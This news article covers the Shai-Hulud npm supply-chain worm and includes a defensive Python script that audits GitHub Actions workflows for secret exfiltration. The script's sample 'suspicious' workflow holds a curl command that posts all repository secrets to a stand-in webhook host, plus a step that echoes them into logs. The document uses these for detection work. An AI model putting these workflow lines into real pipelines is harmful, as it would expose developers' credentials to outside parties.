• A new supply-chain attack compromised at least 187 npm packages, targeting developer secrets across software projects
• Shai-Hulud worm looks to steal credentials, modify packages, and spread malware through GitHub Actions and npm tokens
• Researchers warn the number of compromised packages is likely to grow

At least 187 malicious npm packages have been uncovered, part of yet another major supply-chain attack against software developers.

Security researchers from Socket, StepSecurity, and Aikido all detected an ongoing campaign, apparently being orchestrated by the same group that targeted Nx several weeks ago.

Similar to that campaign, in this one the miscreants were also after developer secrets, including login credentials, AWS keys, GCP and Azure service credentials, GitHub personal access tokens, cloud[1] metadata endpoints, and npm authentication tokens.

Many affected

However, the attack methodology evolved, the researchers noted.

“The scale, scope and impact of this attack is significant,” they explained. “The attackers are using the same playbook in large parts as the original attack, but have stepped up their game.”

This time around, the attackers created a worm, called Shai-Hulud (a nod to the Dune worm), which not only steals secrets and publishes them to GitHub publicly (using tools like TruffleHog and queries on cloud metadata endpoints), but also drops a malicious GitHub Action that sends secrets to an attacker-controlled webhook and hides them in logs, and uses stolen npm tokens to modify and republish every package the maintainer controls, embedding the worm in each one.
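The exfiltration path described above runs through a GitHub Actions workflow: a step that dumps the repository's secrets and sends them to an external webhook, or writes them into the job log. The following added example (not code from the article, the researchers, or any of the affected projects) is a small defender-side audit that scans workflow files for those three patterns. The workflow snippets embedded in it are constructed for illustration and are not artifacts from the campaign; the rule names, the trusted-host list and the `hooks.example.invalid` host are assumptions of the example.

```python
import os
import re
from typing import Dict, List

# Constructed sample workflows (illustrative only, not real indicators of compromise).
SUSPICIOUS_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ toJSON(secrets) }}" | base64
      - run: curl -X POST -d "${{ toJSON(secrets) }}" https://hooks.example.invalid/collect
"""

BENIGN_WORKFLOW = """\
name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Any ${{ ... secrets ... }} expression on a line.
SECRET_REF = re.compile(r"\$\{\{[^}]*secrets[^}]*\}\}", re.IGNORECASE)
# toJSON(secrets) serialises every secret at once; legitimate jobs almost never need it.
DUMP_ALL = re.compile(r"toJSON\(\s*secrets\s*\)")
# Commands that move data over the network, and commands that write to the job log.
NET_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|fetch)\b")
LOG_CMD = re.compile(r"\b(echo|cat|printf|Write-Output)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Hosts a CI job may legitimately talk to while holding a secret (assumed allowlist).
TRUSTED_HOSTS = {"github.com", "api.github.com", "registry.npmjs.org"}


def audit_workflow(text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, rule) where a workflow line looks like secret exfiltration."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        refs_secret = bool(SECRET_REF.search(line))

        if DUMP_ALL.search(line):
            findings.append({"line": lineno, "rule": "dumps-all-secrets", "text": line.strip()})

        if refs_secret and NET_CMD.search(line):
            hosts = [h.lower() for h in URL_HOST.findall(line)]
            # Flag when the destination is not on the allowlist, or cannot be determined.
            if not hosts or any(h not in TRUSTED_HOSTS for h in hosts):
                findings.append({"line": lineno, "rule": "secret-to-external-host", "text": line.strip()})

        if refs_secret and LOG_CMD.search(line):
            findings.append({"line": lineno, "rule": "secret-written-to-log", "text": line.strip()})
    return findings


def is_suspicious(text: str) -> bool:
    return bool(audit_workflow(text))


def audit_repo(root: str) -> Dict[str, List[Dict[str, object]]]:
    """Audit every workflow file under <root>/.github/workflows; returns {path: findings}."""
    results: Dict[str, List[Dict[str, object]]] = {}
    wf_dir = os.path.join(root, ".github", "workflows")
    if not os.path.isdir(wf_dir):
        return results
    for name in sorted(os.listdir(wf_dir)):
        if name.endswith((".yml", ".yaml")):
            path = os.path.join(wf_dir, name)
            with open(path, encoding="utf-8") as fh:
                found = audit_workflow(fh.read())
            if found:
                results[path] = found
    return results


if __name__ == "__main__":
    for f in audit_workflow(SUSPICIOUS_WORKFLOW):
        print(f"line {f['line']}: {f['rule']}: {f['text']}")
    print("benign workflow findings:", audit_workflow(BENIGN_WORKFLOW))
```

Run against a checkout with `audit_repo(".")` to triage a repository; the line-oriented rules deliberately avoid a YAML parser so the script also catches workflows that a malicious commit has left syntactically odd. A hit is a reason to inspect the workflow and rotate the secrets it can reach, not proof of compromise.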

Among the compromised npm packages are those from cybersecurity experts CrowdStrike, as well as others with millions of weekly downloads.

CrowdStrike, on its end, did what it could to mitigate the risk and minimize the damage.

“After detecting several malicious Node Package Manager (NPM) packages in the public NPM registry, a third-party open source repository, we swiftly removed them and proactively rotated our keys in public registries,” a CrowdStrike spokesperson said, The Register reports.

“These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected. We are working with NPM and conducting a thorough investigation.”

At the moment the number of packages affected by the attack sits at 187, but the researchers warned that it will most likely continue to rise, as some potentially compromised packages are still pending validation.

Via The Register[2]

References

  1. cloud (www.techradar.com)
  2. The Register (www.theregister.com)

By admin